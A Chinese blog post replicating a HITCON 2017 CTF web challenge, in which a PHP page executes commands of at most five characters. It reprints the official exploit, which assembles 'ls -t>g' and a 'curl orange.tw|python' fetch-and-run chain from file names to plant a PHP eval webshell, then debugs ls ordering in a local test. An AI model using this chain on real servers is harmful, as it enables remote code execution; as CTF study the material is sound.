前几天做了一道HITCON2017的web题目,与朋友交流之后,有了一点思路,奈何最后还是没有成功解出这题。在writeup出来后,在复现的过程中遇到了一些问题,记录一下。
题目的源码:index.php
<?php
$sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
@exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
@exec('/bin/rm -rf ' . $sandbox);
}
highlight_file(__FILE__);
大致题目的意思就是,当你在GET参数cmd的时候限制了字符的长度为5,思路就是要想办法绕过这个限制来获得webshell
官方给出的exp:
import requests
from time import sleep
from urllib import quote
payload = [
# generate `ls -t>g` file
'>ls\\',
'ls>_',
'>\ \\',
'>-t\\',
'>\>g',
'ls>>_',
# generate `curl orange.tw.tw|python`
'>on',
'>th\\',
'>py\\',
'>\|\\',
'>tw\\',
'>e.\\',
'>ng\\',
'>ra\\',
'>o\\',
'>\ \\',
'>rl\\',
'>cu\\',
# exec
'sh _',
'sh g',
]
r = requests.get('http://52.199.204.34/?reset=1')
for i in payload:
assert len(i) <= 5
r = requests.get('http://52.199.204.34/?cmd=' + quote(i) )
print i
sleep(0.2)
由于我是在本地搭建的环境,不太清楚他的具体环境,只要演示通过这个index.php获得一个webshell就行了。
这个思路就是先想办法通过ls命令,构造出包含 ls -t>g 这条命令的文件,然后再执行它构造出一个包含一句话木马的webshell.
先参考这个文档:
箭头指向的那个字符串,其实是<php? eval($_GET[1])的base64编码,实际上最后执行会base64解码得到PHP一句话木马。
回到之前的题目,要求的是cmd提交的参数长度小于等于5,为了实现更短的生成文件,我们使用>xxx的方式来生成一个名为xxx的文件,而不是使用w>xxx。
这个题目,由于最后要直接执行ls -t>g这条命令的话,至少需要7位的长度,因此考虑先把
ls -t>g用同样的方式把ls -t>g写进一个文件,然后使用sh命令执行这个文件就可以代替ls -t>g的功能。
Exp中
# generate `ls -t>g` file
'>ls\\',
#因为ls命令显示的文件顺序是按名称来排序的,‘ \’ 会排列在 ‘ls\’ 的前面,因此需要先把 'ls\'先写入'_'这个文件,因此执行下面这条命令
'ls>_',
#后面的顺序,ls时默认是按照以下顺序的,因此可以直接输入
'>\ \\',
'>-t\\',
'>\>g',
#最后执行的这条命令,会附加到后面,正好与前面的 'ls\'结合到一起形成'ls -t>g'
'ls>>_',
这部分就是要完成这个功能。
重点来了,我们今天要谈论的问题就是与这个相关。
经过实际的尝试,使用python脚本,把参数按照上面的顺序post到webserver
执行之后,确实在对应的目录下面生成了一个名为_的文件,这个文件的内容为:
最后确实成功执行了ls -t>g这个命令。
注:箭头指向的 \ 实际是因为shell执行换行的命令组合时,需要 \ 来进行转义,否则会单行顺序执行命令。
然而,仔细看上面ls之后显示的文件的排列顺序,实际上在写入'_'文件之后,生成的文件内容不应该是上面的样子。
我实际在bash里面按顺序执行以下命令:
'>ls\\',
'ls>_',
'>\ \\',
'>\>g',
'>-t\\',
'ls>>_'
生成的_文件的内容与通过exp脚本提交参数之后生成的不一样,而用sh执行之后也不能成功执行ls -t>g的命令。
究其原因,就是因为ls命令列目录的时候,'_'和'>g'这两个文件的顺序在-t>这个文件的前面。因此没有办法成功的构造出一个ls -t>g的命令。
经过在我的虚拟机上测试(kali 2.0和ubuntu 16.04)上面测试,使用bash和sh两个终端执行的结果都是一样的,无法成功构造出ls -t>g
我原本以为可能是与exec函数有关,但是实际直接在终端执行php文件的话,构造的结果还是与bash的一样。
因此,我得出的一个结论:
通过webserver中间件 和直接在终端, 执行ls命令,得到的文件的列表的顺序是不一样的。具体的原因暂时还不清楚,希望能有大佬给我指教。感激不尽。
附:本地脚本测试的时候的index.php脚本和exp.py
<?php
$sandbox = '/var/www/html/sanbox/' . md5("orange" . $_SERVER['REMOTE_ADDR'])
;
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
@exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
@exec('/bin/rm -rf ' . $sandbox);
}
highlight_file(__FILE__);
import requests
from time import sleep
from urllib import quote
payload = [
# generate `ls -t>g` file
'>ls\\',
'ls>_',
'>\ \\',
'>\>g',
'>-t\\',
'ls>>_'
]
r = requests.post('http://127.0.0.1/test/?reset=1')
for i in payload:
assert len(i) <= 5
r = requests.post('http://127.0.0.1/test/?cmd=' + quote(i) )
print i
sleep(0.2)
